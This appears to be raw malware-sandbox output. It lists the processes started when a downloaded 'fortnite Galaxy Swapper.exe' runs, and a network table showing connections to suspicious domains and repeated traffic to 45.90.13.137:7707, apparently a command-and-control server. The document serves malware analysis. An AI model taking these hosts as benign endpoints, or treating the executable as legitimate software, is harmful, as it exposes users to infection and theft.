"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\Downloads\document.rtf" /o ""
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
C:\Windows\System32\msiexec.exe
"C:\Windows\System32\msiexec.exe"
C:\Users\Admin\Downloads\fortnite Galaxy Swapper.exe
"C:\Users\Admin\Downloads\fortnite Galaxy Swapper.exe"
C:\Users\Admin\Downloads\fortnite Galaxy Swapper.exe
"C:\Users\Admin\Downloads\fortnite Galaxy Swapper.exe"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k SDRSVC
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffb3028cc40,0x7ffb3028cc4c,0x7ffb3028cc58
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1908,i,1785483332300146940,18144814345919222627,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=1892 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2188,i,1785483332300146940,18144814345919222627,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=2252 /prefetch:3
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2304,i,1785483332300146940,18144814345919222627,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=2352 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3164,i,1785483332300146940,18144814345919222627,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=3184 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3308,i,1785483332300146940,18144814345919222627,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=3328 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4436,i,1785483332300146940,18144814345919222627,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4448 /prefetch:2
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=3736,i,1785483332300146940,18144814345919222627,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4688 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4872,i,1785483332300146940,18144814345919222627,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4700 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4700,i,1785483332300146940,18144814345919222627,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=5036 /prefetch:8
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5320,i,1785483332300146940,18144814345919222627,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=5328 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --field-trial-handle=5348,i,1785483332300146940,18144814345919222627,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=5052 /prefetch:1
C:\Users\Admin\Downloads\fortnite Galaxy Swapper - copia.exe
"C:\Users\Admin\Downloads\fortnite Galaxy Swapper - copia.exe"
C:\Users\Admin\Downloads\fortnite Galaxy Swapper - copia.exe
"C:\Users\Admin\Downloads\fortnite Galaxy Swapper - copia.exe"
C:\Users\Admin\Downloads\fortnite Galaxy Swapper - copia.exe
"C:\Users\Admin\Downloads\fortnite Galaxy Swapper - copia.exe"
C:\Users\Admin\Downloads\fortnite Galaxy Swapper - copia.exe
"C:\Users\Admin\Downloads\fortnite Galaxy Swapper - copia.exe"
C:\Users\Admin\Downloads\fortnite Galaxy Swapper - copia.exe
"C:\Users\Admin\Downloads\fortnite Galaxy Swapper - copia.exe"
C:\Users\Admin\Downloads\fortnite Galaxy Swapper - copia.exe
"C:\Users\Admin\Downloads\fortnite Galaxy Swapper - copia.exe"
C:\Users\Admin\Downloads\fortnite Galaxy Swapper - copia.exe
"C:\Users\Admin\Downloads\fortnite Galaxy Swapper - copia.exe"
C:\Users\Admin\Downloads\fortnite Galaxy Swapper.exe
"C:\Users\Admin\Downloads\fortnite Galaxy Swapper.exe"
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\Desktop\Final July Report FBI.rtf" /o ""
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | mega.nz | udp |
| LU | 31.216.145.5:443 | mega.nz | tcp |
| LU | 31.216.145.5:443 | mega.nz | tcp |
| US | 8.8.8.8:53 | eu.static.mega.co.nz | udp |
| LU | 66.203.124.37:443 | eu.static.mega.co.nz | tcp |
| LU | 66.203.124.37:443 | eu.static.mega.co.nz | tcp |
| US | 8.8.8.8:53 | 5.145.216.31.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 72.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.api.mega.co.nz | udp |
| US | 8.8.8.8:53 | 37.124.203.66.in-addr.arpa | udp |
| LU | 66.203.125.12:443 | g.api.mega.co.nz | tcp |
| LU | 66.203.125.12:443 | g.api.mega.co.nz | tcp |
| US | 8.8.8.8:53 | 12.125.203.66.in-addr.arpa | udp |
| LU | 66.203.124.37:443 | eu.static.mega.co.nz | tcp |
| N/A | 224.0.0.251:5353 | | udp |
| N/A | 127.0.0.1:6341 | | tcp |
| N/A | 127.0.0.1:6341 | | tcp |
| GB | 2.18.27.82:443 | www.bing.com | tcp |
| GB | 2.18.27.82:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 82.27.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | th.bing.com | udp |
| US | 8.8.8.8:53 | r.bing.com | udp |
| GB | 2.18.27.76:443 | r.bing.com | tcp |
| GB | 2.18.27.76:443 | r.bing.com | tcp |
| GB | 104.98.2.161:443 | th.bing.com | tcp |
| GB | 104.98.2.161:443 | th.bing.com | tcp |
| US | 8.8.8.8:53 | 76.27.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 161.2.98.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.youtube.com | udp |
| US | 8.8.8.8:53 | login.microsoftonline.com | udp |
| US | 8.8.8.8:53 | services.bingapis.com | udp |
| US | 13.107.5.80:443 | services.bingapis.com | tcp |
| US | 8.8.8.8:53 | 80.5.107.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 138.32.126.40.in-addr.arpa | udp |
| US | 172.64.154.167:443 | www2.bing.com | tcp |
| US | 172.64.154.167:443 | www2.bing.com | tcp |
| US | 8.8.8.8:53 | 167.154.64.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gfs208n164.userstorage.mega.co.nz | udp |
| FR | 185.206.26.74:443 | gfs208n164.userstorage.mega.co.nz | tcp |
| FR | 185.206.26.74:443 | gfs208n164.userstorage.mega.co.nz | tcp |
| FR | 185.206.26.74:443 | gfs208n164.userstorage.mega.co.nz | tcp |
| FR | 185.206.26.74:443 | gfs208n164.userstorage.mega.co.nz | tcp |
| FR | 185.206.26.74:443 | gfs208n164.userstorage.mega.co.nz | tcp |
| FR | 185.206.26.74:443 | gfs208n164.userstorage.mega.co.nz | tcp |
| US | 8.8.8.8:53 | 74.26.206.185.in-addr.arpa | udp |
| GB | 104.98.2.161:443 | th.bing.com | tcp |
| US | 8.8.8.8:53 | testfamilysafety.bing.com | udp |
| US | 204.79.197.201:443 | testfamilysafety.bing.com | tcp |
| US | 8.8.8.8:53 | 201.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | i.pinimg.com | udp |
| GB | 199.232.56.84:443 | i.pinimg.com | tcp |
| US | 8.8.8.8:53 | www.pixelstalk.net | udp |
| US | 8.8.8.8:53 | jooinn.com | udp |
| US | 8.8.8.8:53 | wallpaperaccess.com | udp |
| US | 172.67.210.245:443 | www.pixelstalk.net | tcp |
| US | 172.67.7.204:443 | wallpaperaccess.com | tcp |
| US | 172.67.222.245:443 | jooinn.com | tcp |
| US | 172.64.154.167:443 | www2.bing.com | tcp |
| US | 172.64.154.167:443 | www2.bing.com | tcp |
| US | 8.8.8.8:53 | 84.56.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 245.210.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 204.7.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 245.222.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | wallup.net | udp |
| US | 8.8.8.8:53 | wallpapers.com | udp |
| US | 8.8.8.8:53 | static.vecteezy.com | udp |
| DE | 144.76.39.8:443 | wallup.net | tcp |
| GB | 18.154.84.104:443 | wallpapers.com | tcp |
| GB | 18.154.84.104:443 | wallpapers.com | tcp |
| US | 104.18.4.151:443 | static.vecteezy.com | tcp |
| US | 8.8.8.8:53 | 104.84.154.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 151.4.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.39.76.144.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 61.39.156.108.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.enjpg.com | udp |
| US | 104.21.1.48:443 | www.enjpg.com | tcp |
| US | 8.8.8.8:53 | 48.1.21.104.in-addr.arpa | udp |
| US | 172.64.154.167:443 | www2.bing.com | tcp |
| US | 172.64.154.167:443 | www2.bing.com | tcp |
| US | 8.8.8.8:53 | aefd.nelreports.net | udp |
| US | 8.8.8.8:53 | a.nel.cloudflare.com | udp |
| US | 35.190.80.1:443 | a.nel.cloudflare.com | tcp |
| GB | 173.222.211.40:443 | aefd.nelreports.net | tcp |
| GB | 173.222.211.40:443 | aefd.nelreports.net | tcp |
| US | 35.190.80.1:443 | a.nel.cloudflare.com | udp |
| US | 8.8.8.8:53 | 1.80.190.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 40.211.222.173.in-addr.arpa | udp |
| US | 8.8.8.8:53 | wallpapercave.com | udp |
| US | 172.67.29.26:443 | wallpapercave.com | tcp |
| US | 172.67.29.26:443 | wallpapercave.com | tcp |
| US | 172.67.29.26:443 | wallpapercave.com | tcp |
| US | 8.8.8.8:53 | images8.alphacoders.com | udp |
| US | 8.8.8.8:53 | apps.identrust.com | udp |
| US | 104.20.75.132:443 | images8.alphacoders.com | tcp |
| GB | 2.18.190.81:80 | apps.identrust.com | tcp |
| GB | 2.18.190.81:80 | apps.identrust.com | tcp |
| US | 8.8.8.8:53 | cdn.wallpapersafari.com | udp |
| US | 104.21.72.145:443 | cdn.wallpapersafari.com | tcp |
| US | 8.8.8.8:53 | 26.29.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 132.75.20.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 81.190.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 145.72.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | wallpapersafari.com | udp |
| US | 172.67.151.97:80 | wallpapersafari.com | tcp |
| US | 172.67.151.97:80 | wallpapersafari.com | tcp |
| US | 8.8.8.8:53 | mcdn.wallpapersafari.com | udp |
| US | 8.8.8.8:53 | googleads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | www.googletagservices.com | udp |
| NL | 142.250.102.155:443 | www.googletagservices.com | tcp |
| NL | 142.250.102.155:443 | www.googletagservices.com | tcp |
| US | 8.8.8.8:53 | static.cloudflareinsights.com | udp |
| US | 104.16.80.73:443 | static.cloudflareinsights.com | tcp |
| US | 8.8.8.8:53 | 97.151.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.102.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 155.102.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.27.250.142.in-addr.arpa | udp |
| NL | 142.250.102.155:443 | www.googletagservices.com | tcp |
| US | 8.8.8.8:53 | region1.analytics.google.com | udp |
| US | 8.8.8.8:53 | stats.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | www.google.co.uk | udp |
| US | 216.239.34.36:443 | region1.analytics.google.com | tcp |
| US | 8.8.8.8:53 | fundingchoicesmessages.google.com | udp |
| NL | 142.250.27.100:443 | fundingchoicesmessages.google.com | tcp |
| US | 8.8.8.8:53 | 73.80.16.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 36.34.239.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 94.102.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 100.27.250.142.in-addr.arpa | udp |
| NL | 142.250.27.100:443 | fundingchoicesmessages.google.com | udp |
| US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tpc.googlesyndication.com | udp |
| US | 8.8.8.8:53 | p4-ehphv4rdhic72-vimgueom6mxvyyyd-if-v6exp3-v4.metric.gstatic.com | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| NL | 142.250.102.132:443 | tpc.googlesyndication.com | tcp |
| NL | 142.250.102.132:443 | tpc.googlesyndication.com | tcp |
| NL | 142.250.102.132:443 | tpc.googlesyndication.com | tcp |
| NL | 142.250.102.132:443 | tpc.googlesyndication.com | tcp |
| NL | 142.250.102.132:443 | tpc.googlesyndication.com | tcp |
| US | 8.8.8.8:53 | 95.27.250.142.in-addr.arpa | udp |
| NL | 142.250.27.106:443 | www.google.com | tcp |
| US | 216.239.34.36:443 | region1.analytics.google.com | udp |
| US | 8.8.8.8:53 | 132.102.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 94.27.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 106.27.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ads.eu.criteo.com | udp |
| NL | 178.250.1.17:443 | ads.eu.criteo.com | tcp |
| US | 8.8.8.8:53 | rtb.nl3.eu.criteo.com | udp |
| NL | 178.250.1.10:443 | rtb.nl3.eu.criteo.com | tcp |
| US | 8.8.8.8:53 | static.criteo.net | udp |
| US | 8.8.8.8:53 | cat.nl3.eu.criteo.com | udp |
| US | 8.8.8.8:53 | cdnjs.cloudflare.com | udp |
| NL | 178.250.1.3:443 | static.criteo.net | tcp |
| NL | 178.250.1.3:443 | static.criteo.net | tcp |
| NL | 178.250.1.3:443 | static.criteo.net | tcp |
| NL | 178.250.1.3:443 | static.criteo.net | tcp |
| NL | 178.250.1.3:443 | static.criteo.net | tcp |
| NL | 178.250.1.6:443 | cat.nl3.eu.criteo.com | tcp |
| US | 104.17.25.14:443 | cdnjs.cloudflare.com | tcp |
| US | 8.8.8.8:53 | imageproxy.eu.criteo.net | udp |
| US | 8.8.8.8:53 | csm.eu.criteo.net | udp |
| NL | 178.250.1.15:443 | imageproxy.eu.criteo.net | tcp |
| NL | 178.250.1.15:443 | imageproxy.eu.criteo.net | tcp |
| NL | 178.250.1.15:443 | imageproxy.eu.criteo.net | tcp |
| NL | 178.250.1.25:443 | csm.eu.criteo.net | tcp |
| US | 8.8.8.8:53 | 17.1.250.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.1.250.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 6.1.250.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.25.17.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.1.250.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.1.250.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.1.250.178.in-addr.arpa | udp |
| US | 172.67.151.97:443 | mcdn.wallpapersafari.com | tcp |
| NL | 142.250.102.132:443 | tpc.googlesyndication.com | udp |
| NL | 142.250.27.106:443 | www.google.com | udp |
| US | 8.8.8.8:53 | ep1.adtrafficquality.google | udp |
| NL | 142.250.27.154:443 | ep1.adtrafficquality.google | tcp |
| US | 8.8.8.8:53 | 154.27.250.142.in-addr.arpa | udp |
| US | 104.16.80.73:443 | static.cloudflareinsights.com | tcp |
| US | 35.190.80.1:443 | a.nel.cloudflare.com | udp |
| GB | 173.222.211.40:443 | aefd.nelreports.net | udp |
| US | 104.16.80.73:443 | static.cloudflareinsights.com | tcp |
| US | 8.8.8.8:53 | get-license4.com | udp |
| US | 104.21.21.238:443 | get-license4.com | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| NL | 142.250.27.94:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | 238.21.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | hit-8841.com | udp |
| US | 172.67.180.25:80 | hit-8841.com | tcp |
| US | 8.8.8.8:53 | 25.180.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | back-kurwa.com | udp |
| US | 172.67.172.104:80 | back-kurwa.com | tcp |
| US | 172.67.172.104:443 | back-kurwa.com | tcp |
| US | 8.8.8.8:53 | two-root.com | udp |
| US | 172.67.169.37:443 | two-root.com | tcp |
| US | 8.8.8.8:53 | 104.172.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 37.169.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pick-pick.com | udp |
| US | 172.67.218.156:443 | pick-pick.com | tcp |
| NL | 45.156.25.126:80 | 45.156.25.126 | tcp |
| US | 8.8.8.8:53 | 156.218.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 126.25.156.45.in-addr.arpa | udp |
| US | 216.239.34.36:443 | region1.analytics.google.com | udp |
| GB | 92.123.142.104:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 104.142.123.92.in-addr.arpa | udp |
| GB | 95.101.129.216:443 | www.bing.com | tcp |
| GB | 95.101.129.216:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 216.129.101.95.in-addr.arpa | udp |
| GB | 95.101.129.216:443 | www.bing.com | udp |
| US | 8.8.8.8:53 | r.bing.com | udp |
| US | 8.8.8.8:53 | th.bing.com | udp |
| GB | 95.101.129.233:443 | th.bing.com | tcp |
| GB | 95.101.129.233:443 | th.bing.com | tcp |
| GB | 95.101.129.146:443 | th.bing.com | tcp |
| GB | 95.101.129.146:443 | th.bing.com | tcp |
| US | 8.8.8.8:53 | 233.129.101.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 146.129.101.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | bazaar.abuse.ch | udp |
| US | 151.101.194.49:443 | bazaar.abuse.ch | tcp |
| US | 151.101.194.49:443 | bazaar.abuse.ch | tcp |
| US | 8.8.8.8:53 | 49.194.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 226.20.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| NL | 142.250.27.105:443 | www.google.com | udp |
| NL | 142.250.27.105:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | 105.27.250.142.in-addr.arpa | udp |
| GB | 95.101.129.233:443 | th.bing.com | udp |
| US | 8.8.8.8:53 | fpt.microsoft.com | udp |
| US | 52.167.30.171:443 | fpt.microsoft.com | tcp |
| NL | 142.250.27.105:443 | www.google.com | udp |
| US | 8.8.8.8:53 | 171.30.167.52.in-addr.arpa | udp |
| NL | 142.250.27.105:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | fpt2.microsoft.com | udp |
| US | 172.64.154.167:443 | www2.bing.com | tcp |
| US | 172.64.154.167:443 | www2.bing.com | tcp |
| US | 8.8.8.8:53 | 2.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 40.173.79.40.in-addr.arpa | udp |
| NL | 45.90.13.137:7707 | tcp | |
| US | 8.8.8.8:53 | 137.13.90.45.in-addr.arpa | udp |
| NL | 45.90.13.137:7707 | tcp | |
| NL | 45.90.13.137:7707 | tcp | |
| NL | 45.90.13.137:7707 | tcp | |
| NL | 45.90.13.137:7707 | tcp | |
| NL | 45.90.13.137:7707 | tcp | |
| US | 8.8.8.8:53 | 91.65.42.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | metadata.templates.cdn.office.net | udp |
| GB | 92.123.26.202:443 | metadata.templates.cdn.office.net | tcp |
| US | 8.8.8.8:53 | binaries.templates.cdn.office.net | udp |
| GB | 173.222.211.57:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.57:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.57:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.57:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.57:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.57:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.57:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.57:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.57:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.57:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.57:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.57:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.57:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.57:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.57:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.57:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.57:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.57:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.57:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.57:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.57:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.57:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.57:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.57:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.57:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.57:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.57:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.57:443 | binaries.templates.cdn.office.net | tcp |
| US | 8.8.8.8:53 | 202.26.123.92.in-addr.arpa | udp |
| GB | 173.222.211.57:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.57:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.57:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.57:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.57:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.57:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.57:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.57:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.57:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.57:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.57:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.57:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.57:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.57:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.57:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.57:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.57:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.57:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.57:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.57:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.57:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.57:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.57:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.57:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.57:443 | binaries.templates.cdn.office.net | tcp |
| US | 8.8.8.8:53 | odc.officeapps.live.com | udp |
| GB | 52.109.28.48:443 | odc.officeapps.live.com | tcp |
| US | 8.8.8.8:53 | 57.211.222.173.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.28.109.52.in-addr.arpa | udp |
| NL | 45.90.13.137:7707 | tcp | |
| NL | 45.90.13.137:7707 | tcp | |
| NL | 45.90.13.137:7707 | tcp | |
| NL | 45.90.13.137:7707 | tcp | |
| NL | 45.90.13.137:7707 | tcp | |
| NL | 45.90.13.137:7707 | tcp | |
| NL | 45.90.13.137:7707 | tcp | |
| NL | 45.90.13.137:7707 | tcp | |
| NL | 45.90.13.137:7707 | tcp | |
| NL | 142.250.27.105:443 | www.google.com | udp |
| NL | 142.250.27.105:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | jspm.dev | udp |
| US | 205.234.175.175:443 | jspm.dev | tcp |
| US | 8.8.8.8:53 | blockchain.info | udp |
| US | 104.16.236.243:443 | blockchain.info | tcp |
| US | 8.8.8.8:53 | 175.175.234.205.in-addr.arpa | udp |
| US | 8.8.8.8:53 | blockstream.info | udp |
| US | 35.201.74.156:443 | blockstream.info | tcp |
| US | 8.8.8.8:53 | 243.236.16.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | clients2.google.com | udp |
| NL | 142.250.102.138:443 | clients2.google.com | udp |
| NL | 142.250.102.138:443 | clients2.google.com | tcp |
| NL | 45.90.13.137:7707 | tcp | |
| US | 8.8.8.8:53 | 156.74.201.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 138.102.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.bitcore.io | udp |
| US | 172.67.184.201:443 | api.bitcore.io | tcp |
| US | 172.67.184.201:443 | api.bitcore.io | udp |
| US | 8.8.8.8:53 | dot4net.com | udp |
| US | 172.67.213.148:443 | dot4net.com | tcp |
| US | 8.8.8.8:53 | 148.213.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 201.184.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | dns-tunnel-check.googlezip.net | udp |
| US | 8.8.8.8:53 | tunnel.googlezip.net | udp |
| US | 172.67.213.148:443 | dot4net.com | udp |
| US | 216.239.34.157:443 | tunnel.googlezip.net | tcp |
| US | 216.239.34.157:443 | tunnel.googlezip.net | tcp |
| NL | 45.90.13.137:7707 | tcp | |
| US | 8.8.8.8:53 | 157.34.239.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 155.27.250.142.in-addr.arpa | udp |
